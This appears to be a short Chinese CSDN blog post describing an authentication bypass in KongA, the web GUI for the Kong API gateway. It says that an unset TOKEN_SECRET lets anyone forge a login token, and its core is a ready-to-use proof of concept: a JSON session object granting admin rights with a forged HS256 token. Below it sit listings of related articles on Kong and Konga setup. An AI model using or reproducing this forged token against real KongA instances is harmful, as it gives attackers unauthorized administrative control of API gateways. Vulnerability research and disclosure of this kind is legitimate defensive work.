konga任意用户登录

最新推荐文章于 2024-06-20 18:31:22 发布
最新推荐文章于 2024-06-20 18:31:22 发布
阅读量358 收藏 7
点赞数 5
文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69678131/article/details/138653041
版权

声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者和此公众号不为此承担任何责任。

  • 环境

KongA 简介

KongA 介绍 KongA 是 Kong 的一个 GUI 工具。GitHub 地址是 https://github.com/pantsel/konga。KongA 概述 KongA 带来的一个最大的便利就是可以很好地通过UI观察到现在 Kong 的所有的配置,并且可以对于管理 Kong 节点

漏洞成因

未设置TOKEN_SECRET导致攻击者可以伪造任意用户的token登录后台。

POC

{"user":{"createdUser":null,"updatedUser":1,"node":{"id":1,"name":"admin","type":"default","kong_admin_url":"1","netdata_url":null,"kong_api_key":"","jwt_algorithm":"HS256","jwt_key":null,"jwt_secret":null,"username":"","password":"","kong_version":"0.14.9","health_checks":false,"health_check_details":null,"active":false,"createdAt":"1","updatedAt":"1","createdUser":1,"updatedUser":1},"id":1,"username":"1","email":"qq@qq.com","firstName":null,"lastName":null,"admin":true,"node_id":"","active":true,"activationToken":"1","createdAt":"1","updatedAt":"1"},"token":"eyJhbGciOiJIUzI1NiJ9.MQ.Lu-KcR4aCeuT9hi1K474zV3s4VaopLDCcf4nZvH6DQo"}

这就登录上来了

王洛尘
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
云原生API网关-Kong部署与konga基本使用
qq_42515722的博客
05-24 4473
Konga是一款基于Kong Admin API的GUI图形化管理界面。Kong Gateway 是一个 Lua 应用程序,旨在加载和执行 Lua 或 Go 模块,我们通常称之为插件。Kong 提供了一组与 Kong Gateway 捆绑在一起的标准 Lua 插件。您有权访问的插件集取决于您的安装:开源、企业或在 Kubernetes 上运行的这些 Kong Gateway 选项之一。自定义插件也可以由 Kong 社区开发,并由插件创建者支持和维护。
KONGA配置
这是一个记录学习的博客
03-05 7743
安装KONGA 安装nodejs和git,安装kong的文档中已经安装了,版本>=8,git运行 Centos安装git yum install git -y yum install -y git 需要注意版本,git --version, 版本太低的话需要重新下载,否则gitclone时会报错 git解压编译安装 cdgit-2.0.0 makeconf...
konga】插件之jwt
WeiJiaXiaoBao的专栏
12-26 919
ROUTES添加jwt(为路由添加一个授权用户的jwt),可以添加多个 点击NAME/ID 点击+ADD PLUGIN ADD PLUGIN(重点consumer的id通过API:http://{自己的host}:8001/consumers查看,填到红框),没有consumer的可以自己新建一个,先跳过这一步看下一步 新建consumer 选择新建的用户,Crede...
物联网网关神器 Kong ( 四 )- 利用 Konga 来配置生产环境安全连接 Kong
知无涯
05-19 3914
物联网网关神器 Kong ( 四 )- 利用 Konga 来配置生产环境安全连接 Kong 前言 上一篇我们讲解了 Konga 的搭建和与 Kong 进行默认连接,本篇文章将讲一下如何在生产环境中基于验证的连接 Kong ,并详细讲解其中的参数。 前期准备 如果你需要在生产环境使用,那么你可以将 admin 端口只监听 127.0.0.1 ,然后通过 Kong 自己进行代理并增加效验。 首先,你可以通过默认方法连接上你的 Kong admin,这样方便进行配置。而后创建 Service。 Service
可视化管理工具konga
05-10
浏览器输入 localhost:1338,端口可以在local.js改 默认登录名admin,密码是三个admin 配置kong API地址要填写完整地址,后面不要带‘/’ http://localhost:8001
konga0.14.9镜像
04-14
konga0.14.9镜像
konga-master.zip
04-17
KONG网关 — KongA管理UI使用 konga-master 未kong 界面化开源代码 konga,详情可以查看kong
konga-0.14.9
11-22
konga-0.14.9
kongkonga完整安装包(linux)
02-26
安装方法:https://blog.csdn.net/qq_14999375/article/details/129228919 kong&konga完整安装包,包含文件: - kong - konga(已编译) - postgreSQL12.2 - node14
Konga部署
weixin_43552838的博客
04-02 653
前提:docker、kong、pg 1. 下载镜像(KONGA v0.14.7) 选择有联网的服务器执行以下命令 docker pull pantsel/konga # 若需要部署到只有内网的服务器可将镜像保存到公网服务器本地,通过共享盘将提取到内网服务器,最后使用docker加载本地镜像 # 公网服务器 docker save pantsel/konga > /data/share/src...
kongkonga的动态负载均衡配置实战
weixin_45342351的博客
04-04 4498
网关kong是基于nginx开发,主要作用实现负载均衡。nginx也可以实现负载均衡,但缺点是每次配置后需要重新加载配置文件,重启服务器。kong可以在服务不重启的情况下,动态的配置负载均衡。 一,网关kong接口实现负载均衡的配置 1,配置网关server,name是server名称,host是下游节点服务器名称,每当有请求经过server,都会通过host转发给下游服务器处理 curl -X POST http://ip:8001/services --data "name=api-server"
KONG管理界面KONGA安装使用
robinhunan的博客
12-19 3423
功能 管理所有Kong Admin API的对象. 从数据库、文件和API等导入Consumers。 管理Kong多个节点。 备份、恢复、迁移Kong Nodes使用快照。 使用健康检测监控节点和API状态。 Email和Slack消息通知 支持多管理用户和设置不同权限 支持数据库MySQL, postgresSQL, MongoDB, SQL Server。 安装 安装Node...
kong api可视化管理工具konga安装使用教程
热门推荐
偶爱喝可乐
11-06 1万+
安装这个有些小坑,根据报错信息都可以解决。 安装依赖 # 我的是Deepin 15.4,其它版本系统自行搜索 sudo apt-get install nodejs npm gulp sudo npm install -g bower sudo npm install -g sails 安装konga git clone https://github.com/pantsel/konga.git cd
KONGKONGA部署及配置
qq_20741133的博客
07-08 7537
个人理解,仅供参考: 首先,kong+konga除去其他高级功能,个人觉得就是把nginx,变成可以页面配置的了。比如,配置的router,service就是反向代理,配置upstream就是负载均衡。 本文只介绍KONGA配置service,router,upstream。 使用docker-compose安装: docker-compose.yml [root@ecs-f841-0003 kong]# cat docker-compose.yml version: '3' services: k
2021-08-19关于konga的使用(访问百度首页)
h22407的博客
08-19 735
关于konga的使用首先要设置一个可以使用的服务器(地址有效)添加一个路由访问地址如何添加basic auth 验证这时我们需要添加一个消费者访问地址验证 首先要设置一个可以使用的服务器(地址有效) 然后对应填写好相应的数据 添加一个路由 配置路由 提交: 如果提交不成功,就看是不是输入完路径以后没有按回车 然后就可以看到这个地方多了一个路由接口了 访问地址 此时,我们去访问 http://192.168.65.136:8800/xiaohei 显示成功 或者使用postman去测试 这样就是
面试经验分享 | 24年6月某安全厂商HW面试经验
zkaqlaoniao的博客
06-17 596
也希望大家有什么护网相关的需求和建议都可以留在评论区,大家讨论下,嘿嘿嘿,希望大家伙都可以通过今年的护网面试。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。反射型XSS:反射型XSS攻击是一次性的攻击,当受害者点击恶意链接url的时候,恶意代码会直接在受害者的主机上的浏览器执行。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。
MVC 框架安全
A526847的博客
06-17 609
举例来说,在“注入攻击”一章中,我们并没有使用 PHP 的 magic_quotes_gpc 作为一项 对抗 SQL 注入的防御方案,这是因为 magic_quotes_gpc 是有缺陷的,它并没有在正确的地方 解决问题。其次,对于一些常见的漏洞来说,由程序员一个个修补可能会出现遗漏,而在框架中统一 解决,有可能解决“遗漏”的问题。最后,在每个业务里修补安全漏洞,补丁的标准难以统一,而在框架中集中实施的安全方 案,可以使所有基于框架开发的业务都能受益,从安全方案的有效性来说,更容易把握。
企业防盗版,如何保障上网安全
最新发布
shenxinda_lu的博客
06-20 275
当需要访问互联网时,用户在隔离沙盒内进行操作,确保主机与互联网物理隔离,只有沙盒能够访问互联网,且沙盒与本机隔离。
linux安装konga
12-30
Konga是一个基于Kong的用户友好的控制台管理工具,可以用来管理Kong的API和插件。要在Linux系统上安装Konga,首先需要确保系统上已经安装了Node.js和npm包管理器。接下来,可以通过npm全局安装Konga的包,使用以下命令:`npm install -g konga`。 安装完成后,可以通过命令行启动Konga:`konga start`。接着,可以在浏览器中输入`http://localhost:1337`来访问Konga的web界面。在界面上,可以配置Konga连接到Kong的地址,以便Konga可以管理Kong的API和插件。配置完成后,就可以在Konga中进行API和插件的管理操作了。 在安装和配置Konga过程中,需要确保系统上有合适的权限和依赖,以便Konga可以正常运行。此外,还可以根据实际需求将Konga集成到现有的系统中,以便更方便地管理Kong的API和插件。 总之,在Linux系统上安装Konga,需要先安装Node.js和npm包管理器,然后通过npm安装Konga的包,最后进行配置和启动即可。安装和配置的过程可能会根据具体的系统环境和需求有所不同,但以上步骤可以作为一般的指导。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值